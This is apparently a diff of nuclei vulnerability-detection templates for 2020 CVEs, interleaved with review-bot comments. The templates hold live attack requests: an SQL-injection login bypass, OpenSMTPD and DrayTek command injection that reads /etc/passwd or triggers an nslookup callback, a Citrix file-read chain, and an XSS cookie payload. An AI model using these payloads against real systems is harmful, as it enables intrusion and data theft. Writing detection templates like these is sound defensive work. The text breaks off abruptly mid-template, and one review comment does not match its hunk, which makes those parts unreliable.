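Review bot: The added `remediation` text in the first hunk ("Upgrade to the latest version to mitigate this vulnerability.") asserts a fix that none of the references support: the list holds only the Exploit-DB entry, the vendor product page and the NVD record, and no fixed version is named anywhere in the template. Either cite the release that addresses the XSS or state that none was identified, e.g. `No fixed release was identified at the time of writing; restrict access to the admin interface and validate and encode user input on the affected pages.`. The same unsupported wording is added to CVE-2020-5192 in the next file section ("Apply the latest patch or update provided by the vendor..."). The hunk starts at file line 6, so the `id`/`name` lines are outside this view.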
diff --git a/nuclei-templates/CVE-2020/CVE-2020-5192.yaml b/nuclei-templates/CVE-2020/CVE-2020-5192.yaml index 7897481cfa..1c118bfc6d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5192.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5192.yaml @@ -6,23 +6,34 @@ info: severity: high description: | Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0. reference: - https://www.exploit-db.com/exploits/47840 - https://phpgurukul.com/hospital-management-system-in-php/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5192 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-5192 cwe-id: CWE-89 + epss-score: 0.38401 + epss-percentile: 0.96871 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve2020,hms,cms,sqli,authenticated,edb,cve - + verified: true + max-request: 2 + vendor: phpgurukul + product: hospital_management_system + tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul variables: num: "999999999" -requests: +http: - raw: - | POST /hospital/hms/doctor/index.php HTTP/1.1 
@@ -30,7 +41,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}password={{password}}&submit=&submit= - - | POST /hospital/hms/doctor/search.php HTTP/1.1 Host: {{Hostname}} @@ -40,7 +50,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -51,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 +# digest: 4b0a00483046022100916c7a42d0436fc82b9ac530b4662f02687d7d10be9fd214377e261678aa6844022100f4a16d34647bc967921196ede47cf60acaa958982be7b443d8c1a0548c515288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-5307.yaml b/nuclei-templates/CVE-2020/CVE-2020-5307.yaml deleted file mode 100644 index ca1e464698..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-5307.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-5307 - -info: - name: Dairy Farm Shop Management System - SQL Injection - author: gy741 - description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. - reference: - - https://cinzinga.com/CVE-2020-5307-5308/ - severity: critical - tags: cve,cve2020,sqli - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-5307 - cwe-id: CWE-89 - -requests: - - raw: - - | - POST /dfsms/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "add-category.php" - - - type: status - status: - - 302 
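Review bot: The login body kept as a context line in the `@@ -30,7 +41,6 @@` hunk, `username={{username}}password={{password}}&submit=&submit=`, is missing the `&` between the two fields, so the server receives one malformed `username` value and the session the second request relies on is never established. The sibling template CVE-2020-5191 in this same commit uses `username={{username}}&password={{password}}&submit=&submit=`, which is the form this one needs as well; as written the template will report false negatives against vulnerable installs while still being marked `verified: true`. The raw request this line belongs to starts in the previous hunk.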
diff --git a/nuclei-templates/CVE-2020/cve-2020-5410.yaml b/nuclei-templates/CVE-2020/CVE-2020-5410.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5410.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5410.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-5775.yaml b/nuclei-templates/CVE-2020/CVE-2020-5775.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5775.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5775.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-5776.yaml b/nuclei-templates/CVE-2020/CVE-2020-5776.yaml index 49ae16247d..23edf290ed 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5776.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5776.yaml @@ -1,4 +1,5 @@ id: CVE-2020-5776 + info: name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin author: dwisiswant0 @@ -6,16 +7,16 @@ info: description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI. reference: https://www.tenable.com/security/research/tra-2020-51 tags: cve,cve2020,magmi,magento - # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible + # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible # in the event that a CSRF is leveraged against an existing admin session for MAGMI. - # At the time of this advisory, no patch exists for this issue. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.80 cve-id: CVE-2020-5776 cwe-id: CWE-352 + requests: - raw: - | @@ -45,4 +46,4 @@ requests: condition: and - type: status status: - - 200 + - 200 \ No newline at end of file 
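Review bot: The `@@ -6,16 +7,16 @@` hunk of CVE-2020-5776.yaml leaves the template on the legacy `requests:` key while CVE-2020-5191 and CVE-2020-5192 in the same commit are migrated to `http:`; the new files `cve-2020-15227.yaml`, `cve-2020-15505.yaml` and `cve-2020-19282.yaml` added further down are also written with `requests:`. The same hunk deletes the comment `# At the time of this advisory, no patch exists for this issue.` without adding a `remediation:` field, so the patch-status information is lost rather than refreshed. `cvss-score: 8.80` is likewise left as is while other templates in this commit are normalised to the `8.8` form.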
diff --git a/nuclei-templates/CVE-2020/cve-2020-5847.yaml b/nuclei-templates/CVE-2020/CVE-2020-5847.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5847.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5847.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-6207.yaml b/nuclei-templates/CVE-2020/CVE-2020-6207.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6207.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6207.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-6308.yaml b/nuclei-templates/CVE-2020/CVE-2020-6308.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6308.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6308.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-6950.yaml b/nuclei-templates/CVE-2020/CVE-2020-6950.yaml index bfc641992b..177d7834d0 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-6950.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-6950.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-6950 cwe-id: CWE-22 - epss-score: 0.03494 - epss-percentile: 0.90509 + epss-score: 0.03924 + epss-percentile: 0.91792 cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: product: mojarra shodan-query: html:"javax.faces.resource" fofa-query: body="javax.faces.ViewState" - tags: cve,cve2020,mojarra,lfi + tags: cve,cve2020,mojarra,lfi,eclipse http: - method: GET @@ -45,4 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "") || contains_all(body, "")' condition: and -# digest: 490a00463044022067f7703ca905bae30534b829360f88f19d363a62d509ab225d3dcacc5acaa26b02203cbab4d38982579a1372f0f2d4135eef0485cdfa4dded6af3b2322f801579d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2020/cve-2020-7048.yaml b/nuclei-templates/CVE-2020/CVE-2020-7048.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7048.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7048.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7107.yaml b/nuclei-templates/CVE-2020/CVE-2020-7107.yaml index 3f21dc114f..c526b5ecea 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-7107.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-7107.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.8.30. reference: - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33 @@ -19,7 +21,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00395 - epss-percentile: 0.70518 + epss-percentile: 0.70653 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -27,9 +29,24 @@ info: vendor: etoilewebdesign product: ultimate_faq framework: wordpress - tags: ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp + tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign + +flow: http(1) && http(2) http: + - raw: + - | + GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ultimate FAQ' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E" @@ -51,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bb3a46c403280c4c47f319bd88049f45aa318b7941609c1bb2271b1bef5ec94022100d895aa459117dc04d1a35a02547e9215ee5666d3541adf57872f6680c3fa18f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a98c36c0d43554a80a17b855979ba9b1afd278daecb5f8105fca20d49ac064d4022100b582ef9291592f99197ce65d483f2f18702a4dace55e3b8e7f2fd8626364c8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7209.yaml b/nuclei-templates/CVE-2020/CVE-2020-7209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7209.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7209.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml b/nuclei-templates/CVE-2020/CVE-2020-7247.yaml deleted file mode 100644 index 7786b36556..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7247.yaml +++ /dev/null 
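Review bot: Adding `flow: http(1) && http(2)` and the readme.txt fingerprint request makes this template send two requests, but the `max-request` line under `metadata:` is not in either visible hunk (the `@@ -19,7 +21,7 @@` hunk stops at `verified: true`), so I cannot confirm it was raised to 2 to match. If it still reads 1, the metadata understates the request count. The readme check matches only `Ultimate FAQ` and `Tags:` and does not gate on the plugin version, so the `before 1.8.30` condition from the description is enforced solely by the reflected-XSS request that follows it.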
@@ -1,41 +0,0 @@ -id: CVE-2020-7247 -info: - name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution - author: princechaddha - severity: critical - reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 - tags: cve,cve2020,smtp,opensmtpd,network,rce,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-7247 - cwe-id: CWE-78,CWE-755 - description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." -network: - - inputs: - - read: 1024 - - data: "helo target\r\n" - read: 1024 - - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n" - read: 1024 - - data: "RCPT TO:\r\n" - read: 1024 - - data: "DATA\r\n" - read: 1024 - - data: "\r\nxxxx\r\n.\r\n" - read: 1024 - - data: "QUIT\r\n" - read: 1024 - host: - - "{{Hostname}}" - - "{{Host}}:25" - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - type: word - part: raw - words: - - "Message accepted for delivery" diff --git a/nuclei-templates/CVE-2020/cve-2020-7796.yaml b/nuclei-templates/CVE-2020/CVE-2020-7796.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7796.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7796.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7943.yaml b/nuclei-templates/CVE-2020/CVE-2020-7943.yaml deleted file mode 100644 index 1f5454db70..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-7943.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2020-7943 - -info: - name: Puppet Server and PuppetDB sensitive information disclosure - severity: high - author: c-sh0 - description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information - reference: - - https://puppet.com/security/cve/CVE-2020-7943 - - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 - - https://tickets.puppetlabs.com/browse/PDB-4876 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2020-7943 - cwe-id: CWE-276 - tags: cve,cve2020,puppet,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/metrics/v1/mbeans" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - - - type: word - part: body - words: - - "trapperkeeper" diff --git a/nuclei-templates/CVE-2020/CVE-2020-8091.yaml b/nuclei-templates/CVE-2020/CVE-2020-8091.yaml index 1db40c2759..68c9109a22 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8091.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8091.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-8091 +id: cve-2020-8091 info: name: TYPO3 Cross-Site Scripting Vulnerability diff --git a/nuclei-templates/CVE-2020/cve-2020-8115.yaml b/nuclei-templates/CVE-2020/CVE-2020-8115.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8115.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8115.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8163.yaml b/nuclei-templates/CVE-2020/CVE-2020-8163.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8163.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8163.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8193.yaml b/nuclei-templates/CVE-2020/CVE-2020-8193.yaml index 286402bddc..78ea8a7a5d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8193.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8193.yaml 
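Review bot: `id: cve-2020-8091` lowercases the template id while the file keeps the path `nuclei-templates/CVE-2020/CVE-2020-8091.yaml`, so the id no longer matches the file name; this commit renames several other files in the opposite direction (e.g. `cve-2020-8115.yaml` → `CVE-2020-8115.yaml`). The `cve-id` under `classification:` is outside the hunk, but if it stays `CVE-2020-8091` the template will carry the same identifier in two casings. I would keep `id: CVE-2020-8091`.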
@@ -1,20 +1,19 @@ id: CVE-2020-8193 - info: name: Citrix unauthenticated LFI author: pdteam severity: medium + description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html - description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. - tags: cve,cve2020,citrix,lfi + - https://support.citrix.com/article/CTX276688 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2020-8193 cwe-id: CWE-862 - + tags: cve,cve2020,citrix,lfi,kev requests: - raw: - | @@ -25,39 +24,33 @@ requests: X-NITRO-PASS: xWXHUJ56 - - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 - rand_key: §randkey§ + rand_key: {{randkey}} - - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 - rand_key: §randkey§ + rand_key: {{randkey}} - cookie-reuse: true extractors: - type: regex 
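Review bot: The `@@ -25,39 +24,33 @@` hunk removes `cookie-reuse: true` but keeps the file on the legacy `requests:` key (see the `requests:` context line in the first hunk), and the chain from `/menu/ss?...` through `/rapi/filedownload` depends on cookies set by the earlier responses being replayed. Cookie reuse is the default for raw multi-request templates in nuclei v3, but engines that still consume `requests:` needed the explicit flag, so I would either keep `cookie-reuse: true` or migrate the block to `http:` in the same change. Replacing `§randkey§` with `{{randkey}}` is a genuine fix, since only the latter is a valid reference to the `internal: true` extractor defined further down.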
@@ -66,9 +59,8 @@ requests: internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - matchers: - type: regex regex: - "root:.*:0:0:" - part: body \ No newline at end of file + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-8209.yaml b/nuclei-templates/CVE-2020/CVE-2020-8209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8209.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8209.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8497.yaml b/nuclei-templates/CVE-2020/CVE-2020-8497.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8497.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8497.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8512.yaml b/nuclei-templates/CVE-2020/CVE-2020-8512.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8512.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8512.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml b/nuclei-templates/CVE-2020/CVE-2020-8515.yaml deleted file mode 100644 index c834e6279b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2020-8515 - -info: - name: DrayTek - Remote Code Execution - author: pikpikcu - severity: critical - description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. - reference: - - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8515 - - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html - remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8515 - cwe-id: CWE-78 - tags: cve,cve2020,rce,kev - -requests: - - raw: - - | - POST /cgi-bin/mainfunction.cgi HTTP/1.1 - Host: {{Hostname}} - - action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8615.yaml b/nuclei-templates/CVE-2020/CVE-2020-8615.yaml index acbf4c47d5..573c41bdc3 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8615.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8615.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 - epss-score: 0.00658 - epss-percentile: 0.77209 + epss-score: 0.00632 + epss-percentile: 0.78607 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -28,7 +28,7 @@ info: product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ - tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress + tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" @@ -58,4 +58,4 @@ http: - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and -# digest: 490a00463044022033fbba9cd2cead4021aae72a7bf1e9fe491ddb5cf0a614409e0870026751c44b02202aa48bbfe3142a6bf781aa1f881a06f68fe6fb76e8a5000c3a9b57cc55ed4a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de6de457bb118ab6c4d6b4b82ab6c8ff87768dddd14a369a687a3192e06b4e57022100b77038f1401cb94826ab4e530bebe15addac7087506d0fb7356d04f7c66468f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml index 014f5cb558..83629c7d1c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml 
@@ -1,27 +1,24 @@ id: CVE-2020-8654 - info: - name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution + name: EyesOfNetwork 5.3 - Authenticated RCE author: praetorian-thendrickson severity: high - description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). reference: - https://github.com/h4knet/eonrce - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020 - + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated requests: - method: GET path: - "{{BaseURL}}/css/eonweb.css" - extractors: - type: regex name: version @@ -30,20 +27,15 @@ requests: group: 1 regex: - '# VERSION : ([0-9.]+)' - matchers-condition: and matchers: - type: dsl dsl: - compare_versions(version, '< 5.4', '>= 5.1') - - type: word part: body words: - "EyesOfNetwork" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8771.yaml b/nuclei-templates/CVE-2020/CVE-2020-8771.yaml deleted file mode 100644 index 192592ff42..0000000000 
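Review bot: The `@@ -1,27 +1,24 @@` hunk drops `- https://nvd.nist.gov/vuln/detail/CVE-2020-8654`, the NVD entry for this template's own CVE, and adds `- https://nvd.nist.gov/vuln/detail/CVE-2020-8657` instead, which belongs to a different issue; the new description also writes `2020-8657` without the `CVE-` prefix. The new name `EyesOfNetwork 5.3 - Authenticated RCE` narrows the title to 5.3, yet the dsl matcher in the second hunk still fires on `compare_versions(version, '< 5.4', '>= 5.1')`, so 5.1 and 5.2 installs will be reported under a 5.3-only title. The `msf` tag is removed while the Metasploit module reference is kept. I would restore the CVE-2020-8654 NVD link and keep the name and the version range consistent with each other.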
--- a/nuclei-templates/CVE-2020/CVE-2020-8771.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2020-8771 -info: - name: WordPress Time Capsule < 1.21.16 - Authentication Bypass - author: princechaddha - severity: critical - description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. - reference: - - https://github.com/SECFORCE/WPTimeCapsulePOC - - https://nvd.nist.gov/vuln/detail/CVE-2020-8771 - - https://wpvulndb.com/vulnerabilities/10010 - - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8771 - cwe-id: CWE-287 - tags: cve,cve2020,wordpress,wp-plugin -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: close - Accept: */* - - IWP_JSON_PREFIX - - | - GET /wp-admin/index.php HTTP/1.1 - Host: {{Hostname}} - Connection: close - Accept: */* - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - words: - - '" + condition: or + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13927.yaml b/nuclei-templates/CVE-2020/cve-2020-13927.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13927.yaml rename to nuclei-templates/CVE-2020/cve-2020-13927.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14181.yaml b/nuclei-templates/CVE-2020/cve-2020-14181.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14181.yaml rename to nuclei-templates/CVE-2020/cve-2020-14181.yaml 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-14883.yaml b/nuclei-templates/CVE-2020/cve-2020-14883.yaml
similarity index 100%
rename from nuclei-templates/CVE-2020/CVE-2020-14883.yaml
rename to nuclei-templates/CVE-2020/cve-2020-14883.yaml
diff --git a/nuclei-templates/CVE-2020/cve-2020-15050.yaml b/nuclei-templates/CVE-2020/cve-2020-15050.yaml
index c3a0c4953d..e51ec40239 100644
--- a/nuclei-templates/CVE-2020/cve-2020-15050.yaml
+++ b/nuclei-templates/CVE-2020/cve-2020-15050.yaml
@@ -1,21 +1,34 @@ id: CVE-2020-15050 info: - name: Suprema BioStar2 - Local File Inclusion (LFI) + name: Suprema BioStar <2.8.2 - Local File Inclusion author: gy741 severity: high - description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. + description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. reference: - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - https://www.supremainc.com/en/support/biostar-2-pakage.asp - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 + - 